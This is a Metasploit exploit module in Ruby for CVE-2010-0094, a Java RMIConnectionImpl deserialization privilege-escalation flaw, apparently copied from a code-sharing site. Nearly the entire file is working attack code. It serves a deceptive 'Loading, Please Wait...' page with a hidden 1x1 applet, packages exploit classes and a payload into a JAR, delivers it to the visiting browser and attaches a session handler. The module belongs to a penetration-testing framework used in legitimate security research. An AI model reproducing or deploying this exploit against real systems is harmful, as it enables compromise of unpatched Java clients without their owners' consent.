Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  #
12
  # Superceded by java_trusted_chain
13
  #
14
  #include Msf::Exploit::Remote::BrowserAutopwn
15
  #autopwn_info({ :javascript => false })
16

17
  def initialize( info = {} )
18

19
    super( update_info( info,
20
      'Name'          => 'Java RMIConnectionImpl Deserialization Privilege Escalation',
21
      'Description'   => %q{
22
      This module exploits a vulnerability in the Java Runtime Environment
23
      that allows to deserialize a MarshalledObject containing a custom
24
      classloader under a privileged context. The vulnerability affects
25
      version 6 prior to update 19 and version 5 prior to update 23.
26
      },
27
      'License'       => MSF_LICENSE,
28
      'Author'        => [
29
        'Sami Koivu', # Discovery
30
        'Matthias Kaiser', # PoC
31
        'egypt' # metasploit module
32
      ],
33
      'References'    =>
34
      [
35
        [ 'CVE', '2010-0094' ],
36
        [ 'OSVDB', '63484' ],
37
        [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html' ],
38
      ],
39
      'Platform'      => [ 'java' ],
40
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
41
      'Targets'       =>
42
        [
43
          [ 'Generic (Java Payload)',
44
            {
45
              'Arch' => ARCH_JAVA,
46
            }
47
          ],
48
        ],
49
      'DefaultTarget'  => 0,
50
      'DisclosureDate' => '2010-03-31'
51
      ))
52
  end
53

54

55
  def on_request_uri( cli, request )
56
    if not request.uri.match(/\.jar$/i)
57
      if not request.uri.match(/\/$/)
58
        send_redirect(cli, get_resource() + '/', '')
59
        return
60
      end
61

62
      print_status("#{self.name} handling request")
63

64
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
65
      return
66
    end
67

68
    paths = [
69
      [ "Exploit.class" ],
70
      [ "Exploit$1.class" ],
71
      [ "Exploit$1$1.class" ],
72
      [ "Exploit$2.class" ],
73
      [ "Payloader.class" ],
74
      [ "PayloadClassLoader.class" ],
75
      [ "payload.ser" ],
76
    ]
77

78
    p = regenerate_payload(cli)
79
    jar = p.encoded_jar
80
    paths.each do |path|
81
      1.upto(path.length - 1) do |idx|
82
        full = path[0,idx].join("/") + "/"
83
        if !(jar.entries.map{|e|e.name}.include?(full))
84
          jar.add_file(full, '')
85
        end
86
      end
87
      fd = File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2010-0094", path ), "rb")
88
      data = fd.read(fd.stat.size)
89
      jar.add_file(path.join("/"), data)
90
      fd.close
91
    end
92

93
    print_status("Sending Applet.jar")
94
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
95

96
    handler(cli)
97
  end
98

99
  def generate_html
100
    html  = "<html><head><title>Loading, Please Wait...</title></head>"
101
    html += "<body><center><p>Loading, Please Wait...</p></center>"
102
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
103
    html += "</applet></body></html>"
104
    return html
105
  end
106
end
107

108